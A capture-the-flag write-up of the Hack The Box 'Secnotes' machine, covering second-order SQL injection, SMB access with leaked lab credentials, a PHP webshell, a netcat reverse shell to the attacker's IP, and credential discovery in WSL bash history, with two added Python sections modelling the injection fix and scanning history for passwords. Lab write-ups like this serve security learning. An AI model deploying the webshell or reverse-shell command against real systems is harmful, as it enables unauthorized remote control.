Secnotes Write-up (HTB)
This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.
TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.
PART ONE: USER
Let’s begin with an nmap scan:
It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.
Visiting the website shows a login screen, with the option to create an account:
I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:
There are a few important functions to take from this:
- We can create/delete notes
- We can change our own password
- We can contact the owner
My first discovery on here was that we could perform XSS on any of the fields:
Since we have an option to send forms to the owner, I tried forming a cookie-stealing XSS payload that would steal an administrator's cookie; however, after leaving it for a while, I never received a callback.
I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.
When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In this, SQLi was achieved through creating an account with a username in which the SQL injection took place.
Let's give this a go by creating an account with the username user' OR 1=1#:
With this now created, we can log in and view all the notes!
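As an added illustration (not code from the write-up), here is a minimal Python/SQLite model of the second-order injection just described: the username is stored safely at registration, then spliced unescaped into the notes query after login, beside the parameterized query that closes the hole. Table and column names are assumed, and SQLite needs `--` for the trailing comment where MySQL also accepts the `#` used above.

```python
import sqlite3

# Constructed stand-in for the app's tables; the real schema is not on the page.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE notes(owner TEXT, title TEXT, body TEXT);
        INSERT INTO notes VALUES ('tyler', 'new-site', 'constructed: credential note');
        INSERT INTO notes VALUES ('tyler', 'TestNote', 'constructed: test note');
    """)
    return db

def register(db, username, password):
    # Registration is parameterized, so the hostile username is stored verbatim.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def notes_vulnerable(db, username):
    # Second-order SQLi: the stored username is spliced into the notes query as SQL.
    sql = f"SELECT title FROM notes WHERE owner = '{username}'"
    return [row[0] for row in db.execute(sql)]

def notes_fixed(db, username):
    # Same query with a bound parameter: the username is data, never SQL.
    sql = "SELECT title FROM notes WHERE owner = ?"
    return [row[0] for row in db.execute(sql, (username,))]

def demo(username="user' OR 1=1 -- "):
    """Register the attacker-chosen username and list notes through both queries."""
    db = build_db()
    register(db, username, "password123")
    # After login the app reads the username back from the users table.
    stored = db.execute("SELECT username FROM users WHERE username = ?",
                        (username,)).fetchone()[0]
    return notes_vulnerable(db, stored), notes_fixed(db, stored)

if __name__ == "__main__":
    print(demo())
```

The vulnerable query returns every note in the table for the crafted username, while the parameterized one returns only notes owned by that literal string (none).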
Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:
It looks like we’ve found some SMB credentials! We can now connect to the server like so:
george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\\new-site
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\10.10.10.97\new-site\
smb: \> ls
  .                                   D        0  Sat Sep  8 18:59:16 2018
  ..                                  D        0  Sat Sep  8 18:59:16 2018
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.php                        A       78  Sat Sep  8 18:57:36 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

                12978687 blocks of size 4096. 7860782 blocks available
smb: \>
This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:
Here, we can see a port that didn't appear before: 8808. Attempting to connect to this port reveals that it's running a website:
As such, let’s visit this in the browser:
Since we’ve now found the default IIS page (iisstart.htm), we can assume that the SMB server serves the pages for this site. We can test this theory by uploading a simple “test.html” webpage:
From here it's trivial to upload a PHP webshell and therefore achieve RCE. I used this really short script as my webshell:
    <form action="rce.php" method="get">
      <input type="text" name="cmd">
      <input type="submit">
    </form>
    <?php
    if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
    }
    ?>
With this uploaded, we can now run commands:
Since we have read access, we can go ahead and read the user flag:
PART TWO: ROOT
It would definitely be far easier to move on from here with a "proper" shell, so we should try to upgrade to that. To do so, I first uploaded nc64.exe into the new-site share through the SMB client, and then set up a reverse shell. To set up this shell, I entered…
nc64.exe -e cmd.exe 10.10.14.214 4444
…into the webshell, and waited to catch it with netcat:
With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\

06/21/2018  03:07 PM    <DIR>          Distros
06/21/2018  06:47 PM    <DIR>          inetpub
06/22/2018  02:09 PM    <DIR>          Microsoft
04/11/2018  04:38 PM    <DIR>          PerfLogs
06/21/2018  08:15 AM    <DIR>          php7
08/19/2018  02:56 PM    <DIR>          Program Files
06/21/2018  06:47 PM    <DIR>          Program Files (x86)
06/21/2018  03:07 PM       201,749,452 Ubuntu.zip
06/21/2018  03:00 PM    <DIR>          Users
08/19/2018  11:15 AM    <DIR>          Windows
09/09/2018  03:25 AM                 0 __output
               2 File(s)    201,749,452 bytes
               9 Dir(s)  32,515,137,536 bytes free

C:\>
It's strange to have a Distros folder on a Windows machine, so it seems like this may be what we're looking for. Inside the Distros folder there was one other folder: Ubuntu.
C:\Distros\Ubuntu>dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Distros\Ubuntu

09/09/2018  02:53 AM    <DIR>          .
09/09/2018  02:53 AM    <DIR>          ..
07/11/2017  06:10 PM           190,434 AppxBlockMap.xml
07/11/2017  06:10 PM             2,475 AppxManifest.xml
06/21/2018  03:07 PM    <DIR>          AppxMetadata
07/11/2017  06:11 PM            10,554 AppxSignature.p7x
06/21/2018  03:07 PM    <DIR>          Assets
06/21/2018  03:07 PM    <DIR>          images
07/11/2017  06:10 PM       201,254,783 install.tar.gz
07/11/2017  06:10 PM             4,840 resources.pri
06/21/2018  05:51 PM    <DIR>          temp
07/11/2017  06:10 PM           222,208 ubuntu.exe
07/11/2017  06:10 PM               809 [Content_Types].xml
               7 File(s)    201,686,103 bytes
               6 Dir(s)  32,515,235,840 bytes free

C:\Distros\Ubuntu>
Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that it is part of WSL (the Windows Subsystem for Linux). Since we're looking for ways to get into this, I searched for some other WSL-related files:
Directory of C:\Windows\System32: 114,688 wsl.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf: 114,688 wsl.exe
Directory of C:\Windows\System32: 115,712 bash.exe
Directory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5: 115,712 bash.exe
Directory of C:\Distros\Ubuntu: 222,208 ubuntu.exe
I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):
As part of the usual Linux enumeration, I checked the .bash_history file and found the following:
The administrator SMB credentials are there! Let’s copy this command into our own terminal:
And with that, the box is complete!
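A defender-side check prompted by the .bash_history finding above (added here, not from the write-up): scan shell history lines for commands that carry a password inline, such as smbclient's user%password form, and report each hit with the secret masked. The history lines and every password in them are constructed placeholders.

```python
import re

# Label -> regex; group 1 captures the secret so the finding can be masked.
PATTERNS = {
    "smbclient -U user%pass": re.compile(r"-U\s+'?[^\s'%]+%([^\s']+)"),
    "mysql -p<pass>":         re.compile(r"\bmysql\b.*?\s-p(\S+)"),
    "--password=<pass>":      re.compile(r"--password=(\S+)"),
    "curl -u user:pass":      re.compile(r"\bcurl\b.*?\s-u\s+[^\s:]+:(\S+)"),
    "password= in env/arg":   re.compile(r"(?i)pass(?:word)?=(\S+)"),
}

def scan_history(lines):
    """Return (line_no, label, masked_command) for each line carrying an inline secret."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = raw.strip()
        for label, rx in PATTERNS.items():
            m = rx.search(cmd)
            if m:
                masked = cmd[:m.start(1)] + "***" + cmd[m.end(1):]
                findings.append((n, label, masked))
                break  # one finding per line is enough for a report
    return findings

# Constructed history lines; every password here is a placeholder.
HISTORY = [
    "cd /mnt/c/Users/Administrator",
    r"smbclient -U 'administrator%PLACEHOLDER1' \\\\10.0.0.1\\c$",
    "ls -la",
    "mysql -u root -p",                # prompts for the password: nothing stored
    "mysql -u root -pPLACEHOLDER2",
    "curl -u svc:PLACEHOLDER3 http://localhost/",
    "export DB_PASSWORD=PLACEHOLDER4",
]

if __name__ == "__main__":
    for line_no, label, masked in scan_history(HISTORY):
        print(f"line {line_no}: {label}: {masked}")
```

Run it against the history files of every WSL distro and local user as part of a credential-hygiene review; a hit means the password should be rotated and the line removed from history.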